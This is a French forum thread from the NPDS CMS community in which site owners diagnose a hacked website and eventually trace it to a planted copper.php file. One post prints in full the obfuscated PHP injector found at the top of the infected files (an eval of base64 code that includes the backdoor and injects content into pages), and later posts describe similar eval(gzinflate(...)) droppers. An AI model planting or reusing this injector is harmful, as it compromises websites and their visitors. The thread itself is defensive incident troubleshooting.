NPDS : Gestion de contenu et de communauté

tu es hébergé chez qui?

Je suis chez free.
J'ai vu l'échange avec Hotfirenet, as tu des retours d'analyse de tes fichiers?
J'hésite encore à tout réinstaller :-?
Je viens de remarquer que la plupart de mes fichiers (sur le serveur) possede sur la premiere ligne, donc avant le code NPDS ce code:


<?php /**/eval(base_64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvbW50LzE0NS9zZGEvOC8wL2FuYWJuYW5jeS9lZGl0ZXVyL3RpbnlfbWNlL3RoZW1lcy9hZHZhbmNlZC9kb2NzL2VuL2ltYWdlcy9jb3BwZXIucGhwJykpe2luY2x1ZGVfb25jZSgnL21udC8xNDUvc2RhLzgvMC9hbmFibmFuY3kvZWRpdGV1ci90aW55X21jZS90aGVtZXMvYWR2YW5jZWQvZG9jcy9lbi9pbWFnZXMvY29wcGVyLnBocCcpO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJiFmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe2lmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpe2Z1bmN0aW9uIGd6ZGVjb2RlKCRkKXskZj1vcmQoc3Vic3RyKCRkLDMsMSkpOyRoPTEwOyRlPTA7aWYoJGYmNCl7JGU9dW5wYWNrKCd2JyxzdWJzdHIoJGQsMTAsMikpOyRlPSRlWzFdOyRoKz0yKyRlO31pZigkZiY4KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYxNil7JGg9c3RycG9zKCRkLGNocigwKSwkaCkrMTt9aWYoJGYmMil7JGgrPTI7fSR1PWd6aW5mbGF0ZShzdWJzdHIoJGQsJGgpKTtpZigkdT09PUZBTFNFKXskdT0kZDt9cmV0dXJuICR1O319ZnVuY3Rpb24gZGdvYmgoJGIpe0hlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyRjPWd6ZGVjb2RlKCRiKTtpZihwcmVnX21hdGNoKCcvXDxib2R5L3NpJywkYykpe3JldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxib2R5W15cPl0qXD4pL3NpJywnJDEnLmdtbCgpLCRjKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJGM7fX1vYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>




Message édité par : mimit54 / 20-02-2009 09:17

ouep j'ai vu ca aussi et je me disais que ca venais du cache et en plus base_64_decode n'existe pas dans le code Npds

j'y comprend rien a votre probleme

J'ai rapatrié tous les fichiers de la racine du site, aucune trace du formulaire 'authenticate'
Comment apres avoir 'Valider mes modifications' (changer de theme), je me retrouve avec l'appel de user.php avec juste comme contenu le code copié plus haut.
J'ai fait une erreur tout à l'heure c'est le contenu de user.php et non pas submit.php :-(
J'aime pas ne pas comprendre :paf mais où chercher :-? :-?

ba c ça le problème, je ne sais plus ou chercher ...
ce qui m'a parut bizarre pour bege, c'est que j'ai récupérer son site et installer sur mon serveur et la je n'avez plus d'erreur plus de script !javascript! plus de problème ...

donc est ce que ton site utilise d'autre script que NPDS ?

Oui, en effet j'ai encapsulé Coppermine. Tu penses que je dois le virer pour voir?
bege avait d'autres scripts que NPDS?

Je peux préciser que je n'ai rien vu d'anormal dans les fichiers security.log, par contre dans les sessions, j'ai très fréquemment 5,6 voire 9 sessions d'anonymes provenant d'adresse de sites étrangers sans aucun rapport avec le sujet traité sur mon site.
Voici d'ailleurs l'adresse: http://anabnancy.free.fr/

Message édité par : mimit54 / 21-02-2009 14:33

aaaaaaaaaaaargh! nan, fallait pas me montrer ça!!!
j'aime trop les Bonsaï!
mais j'ai aussi trop de passions, ça va plus ça, c'est de la provoc! je me plaindrais :-D


P.S.
rien à voir mais plus moyen de mettre un avatar dans mon profil :-(

Ah oui, c'est une de mes nombreuses occupations, patience, nature, soins, bien être à tailler, regarder pousser mais bref on est pas là pour ça, cet après midi, j'ai commencé un rempotage, ça m'a detendu de l'informatique :=!
Mais j'y suis de nouveau et voici le résultat!!
J'ai copié tout mon site, BdD comprise en local, sous EasyPHP et pas une erreur, pas de formulaire bizarre, mais où se cache le diable :-?
Là, je vais me coucher, car ça me dépasse! J'espère que je ne vais pas faire de cauchemar ;-)

pourtant tu es en sable evol toi contrairement a bege ...

Le canard est toujours vivant!!
J'ai transféré tout le contenu du site sur un autre hébergement, pas de pb. Je sais que bege nous a fait part de tout refaire, alors je voulais savoir si l'opération a été concluante avant de m'y lancer.

ah oui j'ai recréé une nouvelle base de donnée et j'ai réinstallé Sable évolution tout neuf dessus et tout est bon,

tout? non,... juste que je n'arrive toujours pas intégrer des photos dans la lettre d'information :-?
c'est à dire que j'arrive l'intégrer et quand je fais un test je la voit affichée, en plus elle se trouve bien dans le répertoire users_private, mais quand la lettre arrive par email il y a une croix rouge à la place de l'image :-?

Du neuf 8-)
Je pense avoir identifié le malin. Merci la communauté car je n'y suis pour pas grand chose, de plus comme je pratique que le strict minimum l'anglais (trop vieux et ce n'est plus maintenant que je vais m'y mettre, tant pis!!) , je ne comprends pas tout ce qui est raconté dans les forums ci-dessous.
Alors, je vous soumets le truc, si celà peut servir, j'ai compris qu'un fichier appelé copper.php a éte glissé dans editeur\tiny_mce\themes\advanced\docs\en\images (je l'ai identifié et viré) mais je ne sais pas comment.
Voici les adresses où j'ai récupére l'info.
http://www.forum.nfrance.com/t4948-Hack.html
http://www.simplemachines.org/community/index.php?topic=291486.0
En tous les cas, le fichier en question retiré, je n'ai plus de problème et mon site est nickel.
Merci NPDS et toute l'équipe. 8-) :=! :=!

Message édité par : mimit54 / 24-02-2009 15:38

j'ai cherché ce fichier copper.php mais je n'ai rien trouvé :-?

As tu bien lancé la recherche sur ton site rapatrie, ce n'est pas sur qu'il soit au même endroit que moi. Tu as vu sur un des forums que je site, il était sous tiny (bizarre!), mais ailleurs.
Bonne chance, car on respire après ça :-)

reste donc a savoir comment il est arrivé là ce fichier :#

Tout à fait, et c'est encore un grand mystere, je guette tous les jours si il ne réapparait pas. C'est assez facile, car à part aller voir sous Tiny, tous mes fichiers *.php étaient modifiés (regarder date modif), alors je guette!!
J'ai désactivé filemanager et Coppermine est à jour.
J'attends de voir :-? :-?

Des news ?
++

ouala vache ca arrache ca !!!

hein? mais de quoitesque?

oup's! oublié de me logger

Je viens de rencontrer le même problème aujourd'hui sur mon site lors de la modification d'un article (apparition d'un écran avec un bouton authenticate et impossibilité d'enregistrer les modifications)
J'ai rapatrié mon site et cherché en vain un fichier copper.php
Après recherche j'ai trouvé dans un dossier joomla intitulé ja et inutilisé (version non installée) dans lequel dans un sous-répertoire
plugins\editors\tinymce\!!jscript!!s\tiny_mce\themes\advanced\images\xp
j'ai
2 fichiers php
un appelé s.php qui commence par <?php eval(gzinflate(base_64_decode ...
un second appelé style.css.php qui commence par <?php eval(base_64_decode('
1 fichier 0 dans lequel entre balises html il y a l'adresse de mon site suivie de & reg
plus de 9000 fichiers :D dont les noms sont du style 0a945a2394f0ec8413d572646227c45a et qui contiennent tous des adresses de sites
Ce que je ne comprends pas et surtout ne em rassure pas c'est que la simple suppression de ce répertoire, qui n'avait aucun lien avec mon site NPDS, a débloqué la modification des articles du site et pourquoi le problème n'est-il apparu qu'aujourd(hui alors que les 9000 fichiers semblent montrer que le problème n'est pas récent !

J'allais oublier l'essentiel il y avait du code dans admin.php commençant aussi par
<? /**/eval(base_64_decode

Message édité par : gsguy / 09-07-2009 12:03